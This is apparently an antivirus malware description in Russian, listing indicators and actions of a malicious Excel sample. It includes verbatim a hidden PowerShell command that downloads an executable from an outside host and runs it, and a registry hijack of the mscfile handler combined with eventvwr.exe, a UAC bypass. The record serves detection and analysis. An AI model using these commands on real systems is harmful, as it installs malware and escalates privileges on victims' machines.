Техническая информация
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\msmsystem.exe'
- http://geosystem.com.my/doc/ogi.exe как %temp%\msmsystem.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://geosystem.com.my/doc/ogi.exe','%TEMP%\msmsystem.exe') & reg add HKCU\Software\Classes\mscfile\...
- <Текущая директория>\103e0000
- <PATH_SAMPLE>.xls
- 'ge####tem.com.my':80
- 'ge####tem.com.my':443
- http://ge####tem.com.my/doc/ogi.exe
- 'ge####tem.com.my':443
- DNS ASK ge####tem.com.my
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://geosystem.com.my/doc/ogi.exe','%TEMP%\msmsystem.exe') & reg add HKCU\Software\Classes\mscfile\...' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\msmsystem.exe /f
- '<SYSTEM32>\eventvwr.exe'